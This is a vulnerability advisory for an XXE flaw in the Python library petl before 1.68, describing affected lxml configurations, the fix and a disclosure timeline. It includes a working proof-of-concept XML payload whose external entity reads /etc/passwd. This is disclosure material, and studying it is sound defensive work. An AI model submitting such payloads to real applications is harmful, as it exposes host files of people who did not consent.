petl is a Python library that provides functions for extraction, transformation, and loading (ETL) of data.
petl before 1.68, in some configurations, allows resolution of entities in XML input. An attacker who is able to submit XML input to an application using petl can disclose arbitrary files on the file system in the context of the user under which the application is running.
Applications that:
- accept user-supplied XML input that is processed using petl < 1.68
- configure lxml as the underlying XML processing library used by petl
Information Disclosure
- Update to petl >= 1.68
The fromxml function in the petl.io.xml module converts an XML document to a tabular structure using an XML parsing library. petl supports using Python's built-in xml library or lxml for parsing XML. lxml is the recommended option.
In petl < 1.68, the fromxml function creates an lxml parser with default settings. By default, lxml is configured to resolve local entities.
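As an illustration of the parser setting involved, here is a minimal sketch that uses only lxml's own API: an XMLParser created with resolve_entities=False keeps entity references as unexpanded nodes, so the referenced file is never read. The helper name parse_untrusted and the sample document are hypothetical, and the advisory does not show how petl 1.68 itself configures the parser.

```python
from lxml import etree

# Parser that keeps entity references as unexpanded nodes instead of
# replacing them with the content of the referenced resource.
SAFE_PARSER = etree.XMLParser(resolve_entities=False)

# Hypothetical sample input that declares an external entity.
DOC = b"""<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<table><tr><td>a</td><td>&xxe;</td></tr></table>
"""


def parse_untrusted(data: bytes):
    """Parse XML bytes without expanding entity references."""
    return etree.fromstring(data, parser=SAFE_PARSER)


root = parse_untrusted(DOC)
# The reference is serialized back as "&xxe;" rather than as file content.
print(etree.tostring(root).decode())
```

An application that builds its own lxml parser for untrusted input would likely want this setting regardless of the petl version in use.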
Example application that would be vulnerable using petl < 1.68 with lxml:
from petl.io.xml import fromxml
petl_table = fromxml('input.xml', 'tr', 'td')
To disclose the /etc/passwd file on the application's host, an attacker could supply a crafted XML file like this:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT table ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<table>
<tr>
<td>a</td><td>&xxe;</td>
</tr>
</table>
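For contrast, here is a minimal sketch of how Python's built-in parser reacts to the same payload. It assumes the built-in path goes through xml.etree.ElementTree; the advisory only says "Python's built-in xml library". The helper name stdlib_rejects is hypothetical. ElementTree does not expand external entities and raises ParseError when it meets the reference:

```python
import xml.etree.ElementTree as ET

# The crafted document from the advisory, as bytes.
PAYLOAD = b"""<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT table ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<table>
<tr>
<td>a</td><td>&xxe;</td>
</tr>
</table>
"""


def stdlib_rejects(document: bytes) -> bool:
    """Return True if ElementTree refuses to parse the document."""
    try:
        ET.fromstring(document)
    except ET.ParseError:
        # External entity references are reported as undefined entities.
        return True
    return False


print(stdlib_rejects(PAYLOAD))
```

This is why only the lxml configuration is listed as affected: the file content is never substituted into the parsed table when the standard-library parser is used.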
- petl-developers/petl#527
- https://petl.readthedocs.io/en/stable/changes.html
- https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing
- Oct. 2, 2020: Notified vendor
- Oct. 5, 2020: petl 1.68 released with mitigation
- Nov. 27, 2020: Public disclosure